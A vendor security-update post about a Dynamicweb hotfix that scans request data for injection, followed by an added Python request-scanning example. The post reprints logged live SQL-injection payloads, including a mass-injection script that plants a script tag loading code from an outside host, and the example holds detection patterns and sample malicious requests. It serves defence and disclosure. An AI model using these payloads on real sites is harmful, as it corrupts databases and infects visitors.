Dynamicweb Security Update

Nicolai Høeg Pedersen

As you hopefully know we released an update of Dynamicweb yesterday containing a security hotfix - this was due to a vulnerability in a specific function in Dynamicweb.
 
Dynamicweb has always made a number of checks on incoming data - this is done automatically when using Base.Request() in code instead of Request.Querystring, Request.Form or postback data - but the checks are only done if using Base.Request.
 
A lot of custom modules do not use this approach and this can be a security risk - it can be used for SQL-injection and html/javascript injections as well.
 
These risks are of course old news to developers – but that does not mean that the appropriate measures are taken to accommodate this all the time.
 
The release we made yesterday contains, apart from a general update of the scan, a new feature to prevent attacks whether the code is ‘good’ or not in this regard. It’s a general surveillance of all data sent to Dynamicweb in GET and POST requests. So all data in these collections is scanned before any code is executed in Dynamicweb – if data is failing a check the request is abandoned and the request is logged by us (as of yesterday).

This has already given a lot of interesting log entries (250+) – most of it coming from all sorts of automatic tools.

Further down I’ve listed some of them for you to see.

So – if you have customers not hosting at Hostnordic, please make sure they get this release soon. Solutions need a Dynamicweb.dll newer than 8th May 2008 to have this fix/feature. The newest release can be found in the download section.

id: 74814
ImageID: 3362 and 1=(select IS_SRVROLEMEMBER('sysadmin'))

id: 3144;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--

NewsID: 55';DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C004100520045002000400054002000760061007200630… AS NVARCHAR(4000));EXEC(@S);--

ID: 5723?ID=5723
_PID: 15471
_M: Shop
Search: True
ShopSearchText: http://index8.tigogo.com >questions i-say http://index2.tigogo.com >valdosta ga newspaper http://index7.tigogo.com >gaston.k12.nc us http://index1.tigogo.com >forty-three year old anthony thompson http://index6.tigogo.com >uscourts

ID: 20
q: 'OR
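
An added example, not Dynamicweb's code and not how Base.Request or the new request scan is implemented: a small parameter check in the spirit of the GET/POST surveillance described above, run over constructed copies of the logged values. It lower-cases each value and decodes 0x… literals before matching, so the mixed-case DECLARE and the CAST(0x… AS NVARCHAR) wrapper seen in the entries cannot slip past, and it returns the reason so the rejected request can be logged. All function names, patterns and sample requests are my own assumptions.

```python
import re

# Checks run on a normalised value (lower-cased, 0x… literals decoded), since
# the logged payloads mix case (dEcLaRe) and hide SQL/HTML inside hex.
SQLI_PATTERNS = [
    r"\bdeclare\s+@", r"\bexec\s*\(", r"\bcursor\s+for\b",
    r"\b(sysobjects|syscolumns)\b", r"is_srvrolemember\s*\(",
    r"(^|[^a-z0-9_])'\s*or\b",   # the bare 'OR probe
    r";\s*--",                   # statement terminator plus comment
]
HTML_PATTERNS = [r"<\s*script\b", r"</\s*title\s*>", r"<!--"]
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)", re.IGNORECASE)


def decode_hex_literal(hexdigits):
    """Decode a SQL 0x… literal: UTF-16LE when the high bytes are zero (NVARCHAR),
    else single-byte text; an odd nibble count (truncated log line) is trimmed."""
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]
    raw = bytes.fromhex(hexdigits)
    if len(raw) >= 4 and raw[1] == 0 and raw[3] == 0:
        return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", "replace")
    return raw.decode("latin-1")


def check_value(value):
    """Return 'sql:<pattern>' or 'html:<pattern>' on failure, None if clean."""
    text = HEX_LITERAL.sub(lambda m: " %s " % decode_hex_literal(m.group(1)), value).lower()
    for kind, patterns in (("sql", SQLI_PATTERNS), ("html", HTML_PATTERNS)):
        for pat in patterns:
            if re.search(pat, text):
                return "%s:%s" % (kind, pat)
    return None


def scan_request(params):
    """Scan every GET/POST parameter before any page code runs; return the log
    line for the first failing parameter, or None to let the request proceed."""
    for name, value in params.items():
        reason = check_value(value)
        if reason:
            return "rejected param=%s reason=%s" % (name, reason)
    return None


# Constructed requests mirroring two of the logged entries above (hypothetical data).
SAMPLE_REQUESTS = [
    {"id": "74814", "ImageID": "3362 and 1=(select IS_SRVROLEMEMBER('sysadmin'))"},
    {"NewsID": "55';SET @S=CAST(0x4400450043004C00410052004500200040005400 AS NVARCHAR(4000));EXEC(@S);--"},
]
```

The ShopSearchText link-spam entry passes these pattern checks, since it carries no SQL or markup; that one is a content-spam problem rather than an injection and needs a different control.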